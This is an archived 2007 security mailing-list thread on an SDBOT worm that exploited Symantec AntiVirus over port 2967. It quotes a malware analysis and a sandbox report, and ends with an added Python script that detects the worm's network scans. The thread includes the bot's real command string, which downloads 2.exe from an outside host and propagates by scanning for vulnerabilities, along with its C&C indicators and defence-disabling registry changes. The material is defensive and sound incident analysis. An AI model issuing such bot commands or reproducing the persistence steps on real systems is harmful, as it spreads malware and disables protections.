Educause Security Discussion mailing list archives

Re: Exploit on port 2967


From: Julian Thompson <jthmpsn2 () MEMPHIS EDU>
Date: Fri, 27 Apr 2007 11:43:24 -0500

We saw a variant of this worm that looked for 4 separate vulnerabilities,
one of them being the Symantec one. This was mitigated somewhat by
upgrading Symantec to 10.1.5 (at least); some days later Symantec also
updated their signatures (or sooner via RapidRelease), which helped track
down any strays. :-) (Prior to version 10 we didn't see any problems.)

Anyway, hope some of this is informative; this is a couple of months old
now.

FYI, I have copied an analysis from [SANDBOX] of the files (captured
using nepenthes) we were seeing dropped onto some machines. Our file
names differ (ours were 1.exe or 2.exe or somenumber.exe, and that pulled
other pieces via ftp I believe), but I suspect it could be the same thing
in the end. We also had them analyzed by those nice people at SANS ISC.
(See below also.)

First, from SANS, as I sent it to them first:

------
Indeed a new SDBOT version. It does some "friendly" things like turning
off windows update, windows firewall, etc, before then joining its
Command&Control channel running on 203.121.79.138.  The C&C channel
still contains the instruction to download 2.exe, and also to propagate
further by scanning for some common vulnerabilities. 
 
s|!sftp 203.121.79.95 8081 1 1 2.exe -s|!asc netapi 30 3 0 -c -h -s|!asc sym 30 3 0 -c -h -s|!asc dcom135 30 3 0 -c -h -s|!asc lsass445 30 3 0 -c -h -s|!asc asn139 30 3 0 -c -h -s
 
Thanks again for sending in the sample!
-daniel

-------

Next from Norman Sandbox

-------
 nepenthes-0da20c6938d385af3e766cc7b07967db-81.exe : W32/Malware
(Signature: W32/Malware.KUK)

 [ General information ]
    * Anti debug/emulation code present.
    * **Locates window " [class OLLYDBG]" on desktop.
    * **Locates window " [class FileMonClass]" on desktop.
    * **Locates window "NULL [class mIRC]" on desktop.
    * **Locates window "NULL [class AIM_CSignOnWnd]" on desktop.
    * File length:        59356 bytes.
    * MD5 hash: 0da20c6938d385af3e766cc7b07967db.

 [ Changes to filesystem ]
    * Creates file C:\WINDOWS\system\system.exe.
    * Deletes file c:\sample.exe.

 [ Changes to registry ]
    * Creates key "HKLM\Software\\Microsoft\\Windows".
    * Sets value "SYSTEMHOST"="c:\sample.exe" in key
"HKLM\Software\\Microsoft\\Windows".
    * Creates key "HKLM\System\CurrentControlSet\Services\SYSTEMSVC".
    * Sets value "ImagePath"=""C:\WINDOWS\system\system.exe"" in key
"HKLM\System\CurrentControlSet\Services\SYSTEMSVC".
    * Sets value "DisplayName"="Windows System Service" in key
"HKLM\System\CurrentControlSet\Services\SYSTEMSVC".
    * Deletes value "SYSTEMHOST" in key
"HKLM\Software\\Microsoft\\Windows".
    * Sets value "WaitToKillServiceTimeout"="7000" in key
"HKLM\System\CurrentControlSet\Control".
    * Modifies value "UpdatesDisableNotify"=" " in key
"HKLM\Software\Microsoft\Security Center".
    * Modifies value "AntiVirusDisableNotify"=" " in key
"HKLM\Software\Microsoft\Security Center".
    * Modifies value "FirewallDisableNotify"=" " in key
"HKLM\Software\Microsoft\Security Center".
    * Modifies value "AntiVirusOverride"=" " in key
"HKLM\Software\Microsoft\Security Center".
    * Modifies value "FirewallOverride"=" " in key
"HKLM\Software\Microsoft\Security Center".
    * Creates key
"HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto
Update".
    * Sets value "AUOptions"=" " in key
"HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto
Update".
    * Creates key "HKLM\System\CurrentControlSet\Services\wscsvc".
    * Sets value "Start"=" " in key
"HKLM\System\CurrentControlSet\Services\wscsvc".
    * Creates key "HKLM\System\CurrentControlSet\Services\TlntSvr".
    * Sets value "Start"=" " in key
"HKLM\System\CurrentControlSet\Services\TlntSvr".
    * Creates key
"HKLM\System\CurrentControlSet\Services\RemoteRegistry".
    * Sets value "Start"=" " in key
"HKLM\System\CurrentControlSet\Services\RemoteRegistry".
    * Creates key "HKLM\System\CurrentControlSet\Services\Messenger".
    * Sets value "Start"=" " in key
"HKLM\System\CurrentControlSet\Services\Messenger".
    * Sets value "restrictanonymous"=" " in key
"HKLM\System\CurrentControlSet\Control\Lsa".
    * Creates key
"HKLM\System\CurrentControlSet\Services\lanmanserver\parameters".
    * Sets value "AutoShareWks"="" in key
"HKLM\System\CurrentControlSet\Services\lanmanserver\parameters".
    * Sets value "AutoShareServer"="" in key
"HKLM\System\CurrentControlSet\Services\lanmanserver\parameters".
    * Creates key
"HKLM\System\CurrentControlSet\Services\lanmanworkstation\parameters".
    * Sets value "AutoShareWks"="" in key
"HKLM\System\CurrentControlSet\Services\lanmanworkstation\parameters".
    * Sets value "AutoShareServer"="" in key
"HKLM\System\CurrentControlSet\Services\lanmanworkstation\parameters".
    * Creates key
"HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate".
    * Sets value "DoNotAllowXPSP2"=" " in key
"HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate".
    * Creates key "HKLM\Software\Microsoft\OLE".
    * Sets value "EnableDCOM"="N" in key "HKLM\Software\Microsoft\OLE".

 [ Network services ]
    * Opens URL: http://www.google.com.
    * Connects to "www.google.com" on port 80 (TCP).
    * Opens URL: www.google.com/.
    * Looks for an Internet connection.
    * Connects to "host.ipv9.info" on port 19555 (TCP).
    * Sends data stream (15 bytes) to remote address "host.ipv9.info",
port 19555.
    * Connects to IRC Server.
    * IRC: Uses nickname [P0|USA|60424].
    * IRC: Uses username XP-3822.
    * IRC: Sets the usermode for user [P0|USA|60424] to -x+i.
    * IRC: Joins channel #host# with password z00n3d.

 [ Process/window information ]
    * Creates service "SYSTEMSVC (Windows System Service)" as
""C:\WINDOWS\system\system.exe"".
    * Attempts to access service "SYSTEMSVC".
    * Creates a mutex xUn3@8loi.
    * Attempts to access service "Tlntsvr".
    * Attempts to access service "RemoteRegistry".
    * Attempts to access service "Messenger".
    * Attempts to access service "SharedAccess".
    * Attempts to access service "wscsvc".

 [ Signature Scanning ]
    * C:\WINDOWS\system\system.exe (59356 bytes) : no signature
detection.

(C) 2004-2006 Norman ASA. All Rights Reserved.

----------------
-----Original Message-----
From: Mike Hanson [mailto:MHanson () CSS EDU] 
Sent: Friday, April 27, 2007 10:52 AM
To: SECURITY () LISTSERV EDUCAUSE EDU
Subject: [SECURITY] Exploit on port 2967

Hello,

Has anybody experienced the Symantec Corporate Edition AntiVirus stack
overflow worm in the last few weeks? We got hit with it here starting
this past Monday. It uses port 2967 on versions 10.0 and 10.1 of Corporate
Edition. We experienced a different variant of what is posted on the
Symantec site:
http://www.symantec.com/avcenter/security/Content/2006.05.25.html#


This exploit drops two files into C:\WINDOWS\system32\wbem; these files
are unsecapp32.exe and unsec.exe. It also drops ftp[1].exe in a Windows
Internet temp file.

This worm generated a tremendous amount of traffic on our network.

I have not been able to find much information on this variant, but I
noticed on the SANS Internet Storm Center website there is a lot of
activity on port 2967.

Thank you.
Mike Hanson
Network Security Manager
The College of St. Scholastica
Duluth, MN 55811
 
(218)-723-7097
mhanson () css edu
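The two analyses in this thread (the SANS note on the SDBOT C&C command and the Norman Sandbox report) give enough indicators for a simple network-side check of the kind both posters needed: which hosts are sweeping port 2967 and the other ports the bot scans, and which hosts talk to the C&C addresses. The Python below is an added example, not code from the thread, from SANS or from Norman. It parses the SDBOT command string quoted in the SANS note to derive the scanned ports, then runs a fan-out detector over constructed firewall log lines (labelled as constructed in the code). The mapping of the `!asc` module names to ports, the log line format, the IRC port 6667 in the sample data, the meaning of the `!sftp` fields beyond host/port/file, and the fan-out threshold are all assumptions of this example.

```python
"""Added example: derive scan ports from the SDBOT C&C command quoted by SANS
and flag scanning hosts and C&C contacts in (constructed) firewall logs."""
import re
from collections import defaultdict

# Port each "!asc" scanner module targets.  The module names come from the
# SANS note; the port assignments are this example's assumption, based on the
# service each name refers to (netapi = MS06-040 Server service, sym = Symantec
# AV Corporate Edition on 2967, dcom135 = RPC/DCOM, lsass445 = LSASS over SMB,
# asn139 = ASN.1 over NetBIOS session).
ASC_MODULE_PORTS = {
    "netapi": 445,
    "sym": 2967,
    "dcom135": 135,
    "lsass445": 445,
    "asn139": 139,
}

# C&C indicators taken from the SANS note and the Norman Sandbox report.
CNC_HOSTS = {"203.121.79.138", "203.121.79.95", "host.ipv9.info"}
CNC_PORTS = {8081, 19555}

# The command string as quoted in the SANS note (joined onto one line).
SDBOT_COMMAND = (
    "s|!sftp 203.121.79.95 8081 1 1 2.exe -s|!asc netapi 30 3 0 -c -h -s|"
    "!asc sym 30 3 0 -c -h -s|!asc dcom135 30 3 0 -c -h -s|"
    "!asc lsass445 30 3 0 -c -h -s|!asc asn139 30 3 0 -c -h -s"
)


def parse_sdbot_command(cmd):
    """Split the pipe-separated SDBOT command into its download and scan parts.

    Returns {"download": (host, port, file) or None,
             "scans": [(module, port_or_None), ...]}.
    """
    result = {"download": None, "scans": []}
    for part in cmd.split("|"):
        tokens = part.strip().split()
        if not tokens:
            continue
        if tokens[0] == "!sftp" and len(tokens) >= 6:
            # "!sftp <host> <port> <?> <?> <file> -s": only host, port and
            # file are read here; the other fields' meaning is not assumed.
            result["download"] = (tokens[1], int(tokens[2]), tokens[5])
        elif tokens[0] == "!asc" and len(tokens) >= 2:
            module = tokens[1]
            result["scans"].append((module, ASC_MODULE_PORTS.get(module)))
    return result


# Assumed firewall log format: "<ts> src=<ip> dst=<ip|host> dport=<n> proto=<p>"
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+src=(?P<src>\S+)\s+dst=(?P<dst>\S+)\s+"
    r"dport=(?P<dport>\d+)\s+proto=(?P<proto>\w+)"
)


def parse_log_line(line):
    """Return a dict for a well-formed line, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["dport"] = int(rec["dport"])
    return rec


def detect(lines, watched_ports, threshold=10):
    """Return (scanners, cnc_hits).

    scanners: {src: {port: distinct_dst_count}} for sources that touched at
              least `threshold` distinct destinations on one watched port.
    cnc_hits: [(src, dst, dport), ...] for traffic to a known C&C host or port.
    """
    fanout = defaultdict(lambda: defaultdict(set))
    cnc_hits = []
    for line in lines:
        rec = parse_log_line(line)
        if rec is None or rec["proto"] != "tcp":
            continue  # malformed or non-TCP: the bot's scans are TCP connects
        if rec["dport"] in watched_ports:
            fanout[rec["src"]][rec["dport"]].add(rec["dst"])
        if rec["dst"] in CNC_HOSTS or rec["dport"] in CNC_PORTS:
            cnc_hits.append((rec["src"], rec["dst"], rec["dport"]))
    scanners = {}
    for src, per_port in fanout.items():
        hot = {p: len(d) for p, d in per_port.items() if len(d) >= threshold}
        if hot:
            scanners[src] = hot
    return scanners, cnc_hits


# Constructed sample log: one host sweeping 12 neighbours on 2967, one host
# with a few normal-looking connections, one C&C contact on an assumed IRC
# port (6667) and one to the sandbox-observed host.ipv9.info:19555.
SAMPLE_LOG = [
    f"2007-04-23T09:12:{i:02d} src=10.20.30.40 dst=10.20.31.{i} dport=2967 proto=tcp"
    for i in range(1, 13)
] + [
    "2007-04-23T09:13:00 src=10.20.30.41 dst=10.20.31.1 dport=2967 proto=tcp",
    "2007-04-23T09:13:01 src=10.20.30.41 dst=10.20.31.2 dport=2967 proto=tcp",
    "2007-04-23T09:13:02 src=10.20.30.41 dst=10.20.31.3 dport=445 proto=tcp",
    "2007-04-23T09:13:05 src=10.20.30.40 dst=203.121.79.138 dport=6667 proto=tcp",
    "2007-04-23T09:13:06 src=10.20.30.40 dst=host.ipv9.info dport=19555 proto=tcp",
    "2007-04-23T09:13:07 src=10.20.30.42 dst=10.20.31.9 dport=2967 proto=udp",
    "this line is not in the expected format",
]


def run_sample():
    """Derive the watched ports from the C&C command and run the detector."""
    parsed = parse_sdbot_command(SDBOT_COMMAND)
    watched = {port for _, port in parsed["scans"] if port is not None}
    scanners, cnc_hits = detect(SAMPLE_LOG, watched, threshold=10)
    return parsed, watched, scanners, cnc_hits


if __name__ == "__main__":
    parsed, watched, scanners, cnc_hits = run_sample()
    print("download:", parsed["download"])
    print("watched ports:", sorted(watched))
    for src, hot in scanners.items():
        print(f"scanner {src}: {hot}")
    for src, dst, dport in cnc_hits:
        print(f"C&C contact {src} -> {dst}:{dport}")
```

The fan-out count per source and port is what separates a worm sweep from ordinary traffic to 2967 (the Symantec management port is used legitimately by the AV server), so the threshold should be set from a baseline of that server's normal client count. The host-side counterpart is the registry and service list in the Norman report above (the Security Center override values, the Start values for wscsvc, TlntSvr, RemoteRegistry and Messenger, the SYSTEMSVC service and C:\WINDOWS\system\system.exe), which can be checked on any host this detector flags.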
